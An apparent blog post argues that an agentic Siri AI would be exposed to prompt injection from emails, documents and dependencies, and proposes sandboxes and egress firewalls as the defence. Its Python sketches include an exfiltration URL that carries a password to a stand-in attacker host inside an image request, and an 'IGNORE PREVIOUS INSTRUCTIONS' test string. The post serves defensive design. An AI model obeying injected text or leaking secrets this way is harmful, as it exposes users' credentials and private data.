I hope you are able to use the latest Apple OSs with Siri AI completely turned off. I believe that, as described, it will be fertile ground for malware, reminiscent of Windows 20 years ago.
I would love to hear from anyone who has details about Siri AI that refute this.
1. Stopping prompt injections is impossible right now.
To back this up, read Anthropic’s system card for Opus 4.8. Page 77 shows, for each of the top models, how likely a prompt injection is to get through. Opus 4.8 is just under 10% with 100 attempts. Gemini (which Siri is based on) is 45% with 100 attempts.
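To see why the number of attempts matters, here is a minimal sketch of how a small per-attempt success rate compounds. It assumes every attempt is independent and equally likely to succeed, which is my simplification and not how the system card computes its figures. The function name and the sample rates are made up for illustration.

```python
def p_any_success(p_single: float, attempts: int) -> float:
    """Chance that at least one of `attempts` independent tries succeeds.

    Assumption: each try succeeds with the same probability `p_single`
    and tries do not influence each other.
    """
    if not 0.0 <= p_single <= 1.0:
        raise ValueError("p_single must be between 0 and 1")
    if attempts < 0:
        raise ValueError("attempts must not be negative")
    # Complement rule: 1 minus the chance that every single try fails.
    return 1.0 - (1.0 - p_single) ** attempts


# Illustrative per-attempt rates, not measured values.
for p in (0.001, 0.005, 0.01):
    print(f"per-attempt {p:.1%} -> over 100 attempts {p_any_success(p, 100):.1%}")
```

An attacker only needs one attempt to land, and untrusted text gives them as many attempts as they care to send.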
This may be an inevitable and unsolvable problem. So …
2. We must assume that any Agent that has been exposed to text that we don’t trust is under the control of an adversary.
This is a design constraint right now. The rest of the system must be architected around this assumption.
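One way to picture this constraint is as taint tracking: the moment a session reads anything untrusted, it is treated as compromised for the rest of its life. The sketch below is hypothetical. `AgentSession`, the action names, and the `PRIVILEGED` set are invented for illustration and do not describe any real agent framework.

```python
from dataclasses import dataclass, field


@dataclass
class AgentSession:
    """Hypothetical wrapper that remembers exposure to untrusted text."""
    tainted: bool = False
    sources: list[str] = field(default_factory=list)

    def read(self, text: str, source: str, trusted: bool) -> str:
        # One untrusted input is enough; the taint is never cleared.
        if not trusted:
            self.tainted = True
            self.sources.append(source)
        return text

    def may_perform(self, action: str, privileged: frozenset[str]) -> bool:
        # A tainted session is assumed to be adversary-controlled,
        # so it loses every privileged action.
        return not (self.tainted and action in privileged)


# Hypothetical action names.
PRIVILEGED = frozenset({"send_network_request", "read_keychain"})

session = AgentSession()
session.read("my own note", source="notes.txt", trusted=True)
print(session.may_perform("read_keychain", PRIVILEGED))   # True

session.read("IGNORE PREVIOUS INSTRUCTIONS ...", source="inbox", trusted=False)
print(session.may_perform("read_keychain", PRIVILEGED))   # False
```

The check has to live outside the model, because a compromised agent cannot be trusted to enforce its own restrictions.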
I would never run an agent on my personal machine, because …
3. There is a lot of untrusted text on my personal devices.
Here is a partial list: all incoming emails and texts, all documents I didn’t write, all e-books, and the sites I browse. Siri AI can also “look” at the apps I am running. If you code on your machine, add all of your dependencies (every README, skill, etc.).
This means that any file type with text is potential malware, not just executables or scripts.
But that’s not the only thing on your machine …
4. There are also a lot of “secrets” on your machine
The partial list above also contains trusted text that holds your secrets, such as your passwords (if you let Siri AI reset them as shown in the keynote), your emails and texts, photos, financial information, personal documents, and bitcoin wallets.
So there is a high chance that an AI Agent under an adversary’s control gets to see a secret. This is not OK, because …
5. The Agent is able to “do things”
For example: form a URL and make a network request with it, control applications, show an image from the internet (which is a special case of requesting a URL).
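To make the URL case concrete: a URL is both an address and a message, so anything the agent puts in the query string reaches whoever runs the server. The sketch below only builds and parses a URL and makes no network request. The host `attacker.example`, the parameter name `d`, and the payload are made up for illustration.

```python
from urllib.parse import parse_qs, urlencode, urlsplit


def build_image_url(base: str, payload: str) -> str:
    """Build a URL that carries `payload` as a query parameter."""
    return f"{base}?{urlencode({'d': payload})}"


# What a hijacked agent could emit as an "image" to display.
url = build_image_url("https://attacker.example/pixel.png",
                      "hunter2 reset code 123456")
print(url)

# What the server on the other end can read back from its access log.
recovered = parse_qs(urlsplit(url).query)["d"][0]
print(recovered)
```

Rendering that “image” is enough to deliver the payload, and no script or executable is involved.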
Siri AI will likely ask for approval, but …
6. Approval-based permission models don’t work
There is no way to make an informed decision about what is safe for an AI Agent to do. Even if you could, you likely won’t be asked to approve URL requests. Also, approval fatigue is real: after enough prompts, people click through without reading.
Apple didn’t show any permission prompts, but I assume that there will be some because they are not using …
7. The “better” (not perfect) solution is sandboxes, firewalls, OS-level auth
In my opinion, the best way to run agents is in sandboxes with their own accounts (not as you or as superuser), with OS-level authorization and firewalls in place. And then … just let the agent go.
The agent will be exposed to prompt injections, but there are no secrets in the sandbox VM, and I limit its actions the same way I would limit a logged-in user on a shared machine. This is just normal system-level user access control.
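The firewall half of this boils down to a default-deny rule: outbound traffic is blocked unless the destination is on a short allowlist. Here is a minimal sketch of that rule. The allowlist entries and the function name are assumptions for illustration, and a real setup would enforce this in the OS or network firewall, outside the agent’s process, not in Python.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist for a coding agent that only needs package downloads.
ALLOWED_HOSTS = frozenset({"pypi.org", "files.pythonhosted.org"})


def egress_allowed(url: str,
                   allowed_hosts: frozenset[str] = ALLOWED_HOSTS) -> bool:
    """Default-deny: permit only HTTPS requests to exact allowlisted hosts."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    # Exact match only, so look-alike hosts that merely start with an
    # allowed name are rejected.
    return parts.scheme == "https" and host in allowed_hosts


print(egress_allowed("https://pypi.org/simple/requests/"))
print(egress_allowed("https://pypi.org.attacker.example/pixel.png?d=secret"))
```

With a rule like this in place, a hijacked agent can still be told to send data somewhere, but the request never leaves the sandbox.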
I wrote about this more in “Escaping the Lethal Trifecta of AI Agents” and “Limiting the Chance of Code Agent Prompt Injections”.